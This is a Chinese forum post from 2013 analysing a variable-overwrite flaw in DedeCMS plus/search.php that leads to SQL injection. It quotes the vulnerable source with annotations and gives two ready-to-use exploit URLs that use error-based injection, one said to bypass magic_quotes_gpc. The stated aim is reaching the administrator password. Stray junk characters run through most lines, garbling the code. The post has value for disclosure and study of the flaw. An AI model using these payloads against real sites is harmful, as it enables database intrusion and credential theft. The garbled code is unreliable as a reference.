微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
6 Z D, _: L+ R6 k, O3 m作者: c4rp3nt3r@0x50sec.org
2 \, C1 ~. s* V8 [& zDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.2 q9 F* H2 v( Z/ b' x9 a. n, F
1 g2 y3 ], B b8 m' y
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
. r4 \( m/ r: `" a# W+ v & H" q9 D- b5 ^2 _
============( T) F4 P: }0 c d- z4 A6 P
, p" P" y9 W1 k$ M7 y8 K% a
0 z8 O; Q5 m1 g9 g" F/ JDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
; q+ ]7 V# W. l, J6 w8 u
. u- N' I5 \% G' w3 P( l( K* Crequire_once(dirname(__FILE__).”/../include/common.inc.php”);
$ m0 E) `6 Z7 R% R E9 xrequire_once(DEDEINC.”/arc.searchview.class.php”); V' q0 ` [% z6 J, ?
! o, Z8 x1 t9 n. t Q. l
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
- j9 P4 I s+ w/ w$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
8 h9 R$ z: c' I1 n+ b$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;& {1 m$ }" U' `" e: n
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
( _) O: k2 L/ K! b; I4 W7 T2 o2 H$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;$ b9 @) q. a3 ~& A0 U, k
6 ~9 C& o7 _! V5 s+ D8 Cif(!isset($orderby)) $orderby=”;8 b' `4 ]7 c" C0 D* I* Z) S
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
$ G% S% Z4 v; s$ b- K2 N# w 1 Z0 m7 V( _" s/ e9 D
" h$ d( ~& M% @& vif(!isset($searchtype)) $searchtype = ‘titlekeyword’;
0 I. ~! n4 w; V) y1 g5 Y3 Velse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
- _: V% P+ L& q/ I, I. I* u8 } ' L# M2 ?1 C9 M% ]3 Q
if(!isset($keyword)){ o+ _4 n6 r* }+ D7 E
if(!isset($q)) $q = ”;' P. K5 S0 | U+ T7 X! i4 _8 p
$keyword=$q;: E, X* ~; t8 l0 b0 \
}+ Q8 h* G5 j2 G* H. s/ ]
& S* ^' Q4 y# t8 y
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));* X6 q7 d$ C. x* x' f ]
! n# z: \& ~- W) s- I% x0 K; I' M* [( ^//查找栏目信息. b4 n, a+ _ _9 y1 [$ A: S8 B# a
if(empty($typeid))
, ] |8 i0 d7 A2 i1 T& D! f. T{2 z9 r% V- g6 D+ [! f7 {5 Y
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
7 L; V" h8 s9 \7 B, p1 |: T if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
7 [# `4 k- `$ ~9 G; Z1 H {+ w/ s Q m: C: d0 ^$ ^3 U; p
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
, W9 H2 ~1 M" {3 i fwrite($fp, “<”.”?php\r\n”);
6 e6 y& ^$ s# a( h6 u# U) g) { $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);. e# n- x* q0 \( X
$dsql->Execute();- t& _ m$ v6 }' Q
while($row = $dsql->GetArray())5 J: m5 r- q) i+ g' X0 ?
{
) u9 ^6 \1 |! I" N7 B* z0 [7 P7 c fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
% t& @% L1 U# P f7 B, a5 t }9 `5 _8 _4 f2 x* @6 X
fwrite($fp, ‘?’.'>’);' X" S+ s" g- \# H" j" {; j# M
fclose($fp);
9 j# O) O- Z8 e$ a5 U }
( z# F2 \$ J/ A: O8 W2 z //引入栏目缓存并看关键字是否有相关栏目内容
- T' q2 O; `, {# s5 O! D require_once($typenameCacheFile);
$ }* M/ p) S. F( Z6 s, g3 F7 T//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个* g( H# l. P$ e% e2 L
//
5 h0 x7 d# _ [ if(isset($typeArr) && is_array($typeArr))0 _) Z9 W7 O: {, H
{
& c: `3 F; c4 g foreach($typeArr as $id=>$typename)" l! Z/ _) {# r: K/ W
{
H9 P2 W( F1 i5 r' p1 M
, B/ A- @& R0 c, l6 V8 s1 T <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
6 t( e4 V' Q3 G if($keyword != $keywordn)2 Y8 T/ c z3 ~5 l
{
6 i$ O) n) l/ l* U4 _; u# Y $keyword = $keywordn;
: F' U; O r2 {1 L; ?3 M! i <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
2 g, V1 r+ R. U. ~) ^2 Q$ h break; }! w7 E9 b3 E. b# F6 O1 x$ L
}# G2 O% [; B8 t$ g# }2 }" R
}
$ C9 v3 }9 Y1 M" w) \! l: | }
m; w' } a( q: o) h}" W5 G/ G! {1 J! n. A
然后plus/search.php文件下面定义了一个 Search类的对象 .
7 U; y% X$ y/ G5 ~6 b在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
% f3 q8 E* k! _- F" `9 U; E( {; }$this->TypeLink = new TypeLink($typeid);+ z9 ^; o5 e! E# Z7 w9 [
3 _& s1 `8 [( }8 B& l, M" FTypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.3 f7 z$ d# l6 }2 X U" ?
6 e5 N' |" J8 v% v
class TypeLink3 h% x- U- E2 k) c; G, ?$ Y
{' }, ]" ^* s/ f" M% y7 O5 }) i
var $typeDir;- R m$ Y5 Z8 P
var $dsql;
& S; ?' D* z, a( X5 ~& J+ l var $TypeID;
. H/ {7 b8 M% P) X* C var $baseDir;# X+ J X8 u, W9 j8 ~ ^9 q% a
var $modDir;
. G+ K h8 I* f: T4 d; Z( n var $indexUrl;
5 W5 t' J( h: G" n4 T4 V/ U var $indexName;7 |. i* g8 b5 C( S
var $TypeInfos;" I0 l% [1 B; z! k" Q: t
var $SplitSymbol;
( J: J7 Q8 J. ?8 p X var $valuePosition;) g/ k7 [" ^" K! x- {% s g
var $valuePositionName;; W9 m" a3 o9 P) O U! H7 r
var $OptionArrayList;//构造函数///////
4 y) ~, s! D C0 H4 ?* q) E4 ^ //php5构造函数8 s' N6 Z: r7 G: ^( ]" j
function __construct($typeid)7 o+ ?/ k: F- y* k1 c$ H
{
& V/ ?4 o; W1 c3 A+ ^# c $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];7 q1 f" I v( e2 \, F0 U% X: {
$this->indexName = $GLOBALS['cfg_indexname'];
+ O* @ D$ b- L: U ~ $this->baseDir = $GLOBALS['cfg_basedir'];- @# Y" w& _8 F- h$ d/ I# s
$this->modDir = $GLOBALS['cfg_templets_dir'];. @ a* V- \. ~+ T9 {
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];6 v; ?0 P) \/ x% k; I
$this->dsql = $GLOBALS['dsql'];/ a4 u4 B+ K4 o1 p
$this->TypeID = $typeid;3 s6 o+ N, t; m$ z t4 I$ g. V: u
$this->valuePosition = ”;. q* ?- a1 ?9 l, A% @2 H) @( s6 b( H
$this->valuePositionName = ”;; [ u, ]. ?6 q7 Y! a: t# d9 G) G( n
$this->typeDir = ”;5 o% I7 ]; D& Q$ U$ ?
$this->OptionArrayList = ”;
9 H0 |" o8 L# `3 V " l+ ] `' s. M: |$ G9 p: c
//载入类目信息$ W+ P* A9 p; A0 ]4 \5 n& B, h
$ ^' \1 y3 ]# D4 U5 w% `
<font color=”Red”>$query = “SELECT tp.*,ch.typename as
# v! w# o3 K* Cctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
K, Z" C. t7 P. Y`#@__channeltype` ch
6 v5 Q) X1 v( s; u$ L% s4 S on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
4 w4 F6 p5 U3 j& U ) y, }6 b* C3 v+ x& x4 P
if($typeid > 0)
+ u# j9 t$ @$ Z6 p- l0 } {
. Q: u7 G: s) S) f' F $this->TypeInfos = $this->dsql->GetOne($query);
3 t9 e- P6 E$ S利用代码一 需要 即使magic_quotes_gpc = Off
2 ^! C* S9 h9 z: |- Z# q% e4 E
' n- K$ U0 o* q# H3 Ywww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title! X. P( `6 I, o# N& ]8 J! F( |
9 [( j, m- `+ x5 D6 K这只是其中一个利用代码… Search 类的构造函数再往下
% q! }/ D r4 N. t$ _- ] - X/ x) R& o4 J9 {! [* a+ p0 b
……省略3 c3 Q% t$ Z7 s- N: z( c: z2 T
$this->TypeID = $typeid;
% z0 Y" P' M; B. G. |……省略
( F3 |5 D+ J/ ]$ jif($this->TypeID==”0″){
# ^6 O1 z: B: q3 e4 e0 X( L $this->ChannelTypeid=1;
7 `8 T+ P6 u7 x7 q }else{
9 k' p- `8 l2 T S5 r1 p, R/ n $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲; j/ D0 ^! ~/ B" y* n
//现在不鸡肋了吧亲…1 p2 v( C% o( O# k
$this->ChannelTypeid=$row['channeltype'];0 x6 b- o. C3 I6 I# A) V5 |
- K) ~8 t! v) t7 D6 {1 [; b3 S }
4 T- x" K: J* J) e# X' C: L6 T5 Y利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用., b7 Q+ R- V0 ?% J0 s1 O1 {
+ `0 h( Y+ [" K" ?) {1 kwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title9 f: b) ~0 {5 a l- E" D- w
+ k1 K- E I" N5 R* T9 b2 X- ~如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站0 o( y' w& k* I+ W" T! [3 g
|
发表于 2013-1-19 08:18:56
收藏
支持
反对